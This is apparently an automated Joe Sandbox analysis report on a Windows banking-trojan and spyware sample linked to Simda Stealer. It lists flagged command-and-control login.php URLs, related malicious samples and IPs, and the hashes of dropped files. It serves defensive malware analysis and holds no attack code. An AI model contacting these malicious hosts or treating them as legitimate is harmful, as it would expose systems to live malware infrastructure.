                                                                                                                                                                                                          http://vopykum.com/login.phpsvchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649079219.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lyxyxox.com/login.phpsvchost.exe, 00000002.00000003.1912922539.0000000005A34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665118368.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662045970.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1940902998.000000000CC51000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1663533223.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1913918462.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.0000000003339000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qedykiv.com/login.phpsvchost.exe, 00000002.00000003.1603267718.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1602887745.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1618370430.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603168288.0000000003343000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603383955.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603167854.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1602885484.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603227948.00000000008F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://puvymul.com/http://lyryled.com/http://lysyxux.com/0svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://puzylol.com/login.phpsvchost.exe, 00000002.00000003.1629387199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1624209052.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635624725.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1623902689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632427360.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632319218.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1629462087.00000000033FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lymywaj.com/login.phpsvchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581649743.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795088390.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590472054.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2682843779.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793070832.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://purywoq.com/login.phpsvchost.exe, 00000002.00000003.1735890542.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1697918003.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1804173388.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1707434591.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084955856.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824916487.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2082300647.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839980751.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://volyzic.com/login.phpsvchost.exe, 00000002.00000003.1912922539.0000000005A34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665118368.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1940902998.000000000CC51000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1913918462.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682351904.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1684842179.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911176076.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.0000000003339000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://vojycec.com/login.phpsvchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://gatyfus.com/login.phpsvchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693275657.0000000003343000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469750159.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565084658.000000000CC58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475947519.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794566523.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695532230.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1692907290.000000000333D000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001218000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 
00000014.00000002.1882088055.0000000001297000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.0000000001368000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://pufybyv.com/login.phpsvchost.exe, 00000002.00000003.1522565965.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523100959.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529694932.00000000033C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://puzylyp.com/svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565184265.0000000003305000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.000000000125D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lyrytun.com/login.phpsvchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2664551045.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590381869.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582128544.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582064020.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667325772.000000000CC12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2666830881.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589646686.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2707783889.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696169271.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599420800.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lyvyjox.com/login.phpsvchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1791268726.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794886536.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794287273.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591143916.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1789782421.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792465812.00000000033FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lysyxux.com/svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                          • 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1553823
Start date and time: 2024-11-11 18:23:03 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 5s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 13
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: WlCVLbzNph.exe
renamed because original name is a hash value
Original Sample Name: 2caf9f151b88a328475181b2ecce22f90694795f.exe
Detection: MAL
Classification: mal100.bank.troj.spyw.expl.evad.winEXE@10/52@2221/23
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 117
• Number of non-executed functions: 213
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 2.23.209.176, 2.23.209.179, 2.23.209.177, 2.23.209.149, 2.23.209.150, 2.23.209.187, 2.23.209.182, 2.23.209.185, 2.23.209.158, 2.23.209.189, 2.23.209.130, 20.42.65.92, 20.42.73.29
• Excluded domains from analysis (whitelisted): www.bing.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, e86303.dscx.akamaiedge.net, onedsblobprdeus17.eastus.cloudapp.azure.com, www.bing.com.edgekey.net, ocsp.digicert.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ocsp.edge.digicert.com, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: WlCVLbzNph.exe
Time | Type | Description
12:24:49 | API Interceptor | 7x Sleep call for process: WerFault.exe modified
12:25:01 | API Interceptor | 529380x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                          uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 13.248.169.48
                                                                                                                                                                                                          M62eQtS9qP.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 13.248.169.48
                                                                                                                                                                                                          Bonelessness.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 13.248.169.48
                                                                                                                                                                                                          roundwood.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 13.248.169.48
                                                                                                                                                                                                          spug64.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 13.248.169.48
                                                                                                                                                                                                          lyvyxor.comBpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 208.100.26.245
                                                                                                                                                                                                          uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 208.100.26.245
                                                                                                                                                                                                          7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 208.100.26.245
                                                                                                                                                                                                          OjKmJJm2YT.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 208.100.26.245
                                                                                                                                                                                                          5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 208.100.26.245
                                                                                                                                                                                                          uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 208.100.26.245
                                                                                                                                                                                                          M62eQtS9qP.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 208.100.26.245
                                                                                                                                                                                                          Bonelessness.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 208.100.26.245
                                                                                                                                                                                                          roundwood.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 208.100.26.245
                                                                                                                                                                                                          spug64.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 208.100.26.245
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                          37f463bf4616ecd445d4a1937da06e19Bpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                          • 75.2.71.199
                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                          uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                          • 75.2.71.199
                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                          7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                          • 75.2.71.199
                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                          11315781264#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                          • 75.2.71.199
                                                                                                                                                                                                          • 188.114.96.3
P52mX04112024145925383.exe | malicious | FormBook, GuLoader
                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                          • 75.2.71.199
                                                                                                                                                                                                          • 188.114.96.3
Factura Honorarios 2024-11-04.exe | malicious | GuLoader, Snake Keylogger
                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                          • 75.2.71.199
                                                                                                                                                                                                          • 188.114.96.3
CERTIFICADO TITULARIDAD.exe | malicious | GuLoader, Snake Keylogger
                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                          • 75.2.71.199
                                                                                                                                                                                                          • 188.114.96.3
Anfrage.exe | malicious | FormBook, GuLoader
                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                          • 75.2.71.199
                                                                                                                                                                                                          • 188.114.96.3
Quotation.exe | malicious | AgentTesla, GuLoader
                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                          • 75.2.71.199
                                                                                                                                                                                                          • 188.114.96.3
Request for Quotation 11-11-2024#U00b7pdf.vbs | malicious | Remcos, GuLoader
                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                          • 75.2.71.199
                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                          No context
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):593
                                                                                                                                                                                                          Entropy (8bit):7.626935561277827
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12:NXnYWSLEmM3e7/EzZUimtdHCD6B+HAwQ0m7xs01O58/fTU6i0rSZd09LQ:FYWSLdM3CENUJtd85IsWO58NGd09k
                                                                                                                                                                                                          MD5:926512864979BC27CF187F1DE3F57AFF
                                                                                                                                                                                                          SHA1:ACDEB9D6187932613C7FA08EAF28F0CD8116F4B5
                                                                                                                                                                                                          SHA-256:B3E893A653EC06C05EE90F2F6E98CC052A92F6616D7CCA8C416420E178DCC73F
                                                                                                                                                                                                          SHA-512:F6F9FD3CA9305BEC879CFCD38E64111A18E65E30D25C49E9F2CD546CBAB9B2DCD03ECA81952F6B77C0EAAB20192EF7BEF0D8D434F6F371811929E75F8620633B
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):43413
                                                                                                                                                                                                          Entropy (8bit):7.989922106220255
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:A6eLDU7W3WFK78WC7qILQs3VmXYouwplwqdb0fN1l7NiQSPanxu5WrgdPOBL/Pno:AD33b4WC7n73YxtBIfN1RNiQyaQ5CBLY
                                                                                                                                                                                                          MD5:88372C8A86B89E2BE5F1FB0F7700185F
                                                                                                                                                                                                          SHA1:E965AFC7C76B9571902B96A5C3A7F80327EA9713
                                                                                                                                                                                                          SHA-256:5A05800057E3A10758220646EDD9B75CF68E67CF4E49429F2BE358BF38CF7985
                                                                                                                                                                                                          SHA-512:6FE6ECD13494544327259D799FF9DEBD7DA4DEBA7B1574DEF962E182AC94D00FBEB97D134242758E3DD0EFE2B0E55B6114499BC8EC7AAA3CB142B4E9A2DF6064
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):114
                                                                                                                                                                                                          Entropy (8bit):6.479691220248167
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:elfPZkATGqaNh/bf4/o/flD2qNJ5ZmANv:elfhkVNh/L4kl2qNJ5ZmAx
                                                                                                                                                                                                          MD5:BFDE1E9E9C32C1681A16139450C6909D
                                                                                                                                                                                                          SHA1:7E669B927E6A75A10A0CA29E38E58DDCB49B725E
                                                                                                                                                                                                          SHA-256:E0D020BA1CB6506CEE234903A44C747EE0CFA7E2D1E60029E4CD8DE9A431512A
                                                                                                                                                                                                          SHA-512:781FD54F155442DD34F9919B3CD063EE399DB411BBFE15F2BDC43D3AB8AC2D04E1011B2C99FAB42BEBF7B903A94E09AAAEF71B7A465D2D04B417F6DAD8E8E396
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):59521
                                                                                                                                                                                                          Entropy (8bit):7.972565113988451
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:1536:ZQimNJq4lkHqWmHwEyivDfOoG5tN06d+1t:ZRukFmHy4rG5tUt
                                                                                                                                                                                                          MD5:2E9FAE09A5455A59C586A90C113A6906
                                                                                                                                                                                                          SHA1:AF3F8279BC4800A211141A10371659D3A7052B2F
                                                                                                                                                                                                          SHA-256:AE1448CF10AD952FB94106D450611453EAD3FD776B180F51A165E665C0E822DD
                                                                                                                                                                                                          SHA-512:EF510DD922089471914F82C1258D0BB25ABEC9CBF3BB6822122E469DE64E0291153A621E65AEFE1052C6DFE618B7110C78B08F6DDEB702CECE93EAAEC2666598
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):114
                                                                                                                                                                                                          Entropy (8bit):6.479691220248167
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:elfPZkATGqaNh/bf4/o/flD2qNJ5ZmANv:elfhkVNh/L4kl2qNJ5ZmAx
                                                                                                                                                                                                          MD5:BFDE1E9E9C32C1681A16139450C6909D
                                                                                                                                                                                                          SHA1:7E669B927E6A75A10A0CA29E38E58DDCB49B725E
                                                                                                                                                                                                          SHA-256:E0D020BA1CB6506CEE234903A44C747EE0CFA7E2D1E60029E4CD8DE9A431512A
                                                                                                                                                                                                          SHA-512:781FD54F155442DD34F9919B3CD063EE399DB411BBFE15F2BDC43D3AB8AC2D04E1011B2C99FAB42BEBF7B903A94E09AAAEF71B7A465D2D04B417F6DAD8E8E396
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
